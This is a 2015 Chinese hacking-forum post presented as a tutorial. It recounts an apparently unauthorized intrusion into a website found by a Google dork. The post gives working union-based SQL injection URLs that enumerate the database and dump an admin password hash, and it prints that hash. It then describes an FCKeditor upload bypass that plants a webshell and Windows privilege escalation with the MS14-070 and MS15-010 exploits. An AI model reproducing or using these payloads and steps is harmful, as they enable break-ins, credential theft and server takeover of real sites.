搜索
查看: 1769|回复: 4

基础手工注入学习(注入+getshell+提权)

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-9-10 21:37:21 | 显示全部楼层 |阅读模式
注入篇:
1st. 找注入

Inurl:php id =
7条结果,挨个试了一下,都是注入。
2nd.注入
基本的还是会一点的。

Order by = 5  显示位为 3 4
http://www.chinabaiker.com/text.php?id=-33 union select 1,2,3,4,5 from mysql.user
1.判断数据库版本及服务信息
                  首先学了concat()了函数的使用
Concat()联合数据。和联合函数union不同,union用于联合两条SQL语句,这个用于联合两条数据结果。通常是联合两个字段名,在错误回注入法中,这个函数会联合更复杂的,以后会讲。数据库中管理员通常有登录名和密码等多个字段,用concat轻松一次注入出来。例如concat(username,0x3a,password),不同字段用逗号,隔开,中间加一个hex编码值。冒号进行hex编码(不知道这个编码的自己Google)得到0x3a,放在concat里面注入以后就显示冒号(自己试验),常用的有0x3a,0x5c,0x5f,0x3c62723e
放到这个站上,自己把语句整理一下
http://www.chinabaiker.com/text.php?id=-33 union select 1,2,concat(0x64617461626173653A,database(),0x5c,0x757365723A,user(),0x5c,0x7665723A,version()),4,5 from mysql.user
database:daili\user:root@localhost\ver:5.5.20
哎呦?Root权限,不错哦~

[size=10.5000pt]2.爆库
然后下面又学了一个group_concat()函数的使用
group_concat()用法与上面类似,通常格式如下:group_concat(DISTINCT+user,0x3a,password),group_concat顾名思义,如果管理员账号不止一个的话,concat一次只能注入出来一个,进行依次注入显然太慢,于是使用group_concat把多条数据一次注入出来。DISTINCT我就不赘言了,你自己试验一下或者Google一下就行,很简单。
再放到这个站语句:
http://www.chinabaiker.com/text.php?id=-33 union select 1,2,concat(0x616C6C207461626C65733A,GROUP_CONCAT(DISTINCT+table_schema)),4,5 from information_schema.columns
3.爆表
http://www.chinabaiker.com/text.php?id=-33 union select 1,2,3,table_name,5 from (select * from information_schema.tables where table_schema=database() order by table_schema limit 1,1)t limit 1--
4.爆字段
http://www.chinabaiker.com/text.php?id=-33 union select 1,2,3,column_name,5 from (select+*+from+information_schema.columns+where+table_name=0x61646D696E(表名hexand table_schema=database() order by 1 limit 0,1)t limit 1--
后面就简单了,
管理员数据就是admin3e2f2ce2a16e73b8187548100fc31a3b(gujingming)

以上注入参考文章:
《手工注入php+MySQL参数,技巧和描述》《php+MySql注入非暴力爆数据库表段》《php+MySql注入非暴力爆字段名》《php+MySQL group_concat函数应用(php+MySql高级注入中国龙芯cpu公司网站语句应用一则)》




Getshell篇:
进了后台,翻了翻,很简单,就一个Fck
各种Fckshell姿势,试了一遍,都不行。(表弟姿势少,等发达了,去日本学习下)
1.二次上传        X
2.FCK突破建立文件夹          X
3.Burp截断  X
4.FCK构造页面上传  X
然后自己想思路
建立1.php的文件夹,会被执行成1_php1.php.gif的图会重命名为1_php.gif
那如果吧“.”写成URL的格式呢?
想一下把.写成%2E,能不能行呢?
然后新建了一个文件夹,名称写1%2Ephp
吼吼,果真成功~然后传了一张GIF马子
然后菜刀连接一下,马子就安静地躺在那了。
说实话,以前还真没遇到过这样的情况。头一次。不知道各位表哥有没有遇到过。

提权篇:


Shell在手,天下我有~aspx支持~
D:\RECYCLER\目录有权限
64位2003
首先就试了一下,MS14-070
执行之后半天没有反应,然后更新了一下缓存
然后打开站点看一下,
各位表哥知道原因吗?
表弟统共没提权几次,这次又遇到了这样的情况。不知道怎么解决了。
然后就等,大概等了有20分钟左右,可以打开了。
这次可不敢再用那个exp了。
求助基友了,把shell丢给基友看了下。
基友果断说:MS15-010
“之前法客开着的时候,就听说他是提权帝,今天一看,果真。。。”
后面紧跟一局:单子站什么的自觉发红包
。。。
我是学习的,手注都不会,接毛单。
然后屁颠屁颠去找exp
传上去执行,还是半天没回显,以为又要出事。赶紧打开站看一下,没死~
再回菜刀看一下~whoami

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x

相关帖子

过段时间可能会取消签到功能了

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
 楼主| 发表于 2015-9-10 21:43:44 | 显示全部楼层
  1. 0x64617461626173653A,database(),0x5c,0x757365723A,user(),0x5c,0x7665723A,version()
复制代码
=
  1. 0x64617461626173653A = database: ,0x3a = : ,3A = :  ,0x5c = \,
复制代码
过段时间可能会取消签到功能了

4

主题

83

帖子

253

积分

我是新手

Rank: 1

积分
253
发表于 2015-9-10 22:18:55 | 显示全部楼层
好,谢谢站长! 又学到了很多
体验为王,用户至上,诚信为本。
Mr.冷雪 该用户已被删除
发表于 2015-9-24 18:06:01 | 显示全部楼层
路过看看,很不错的教程
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表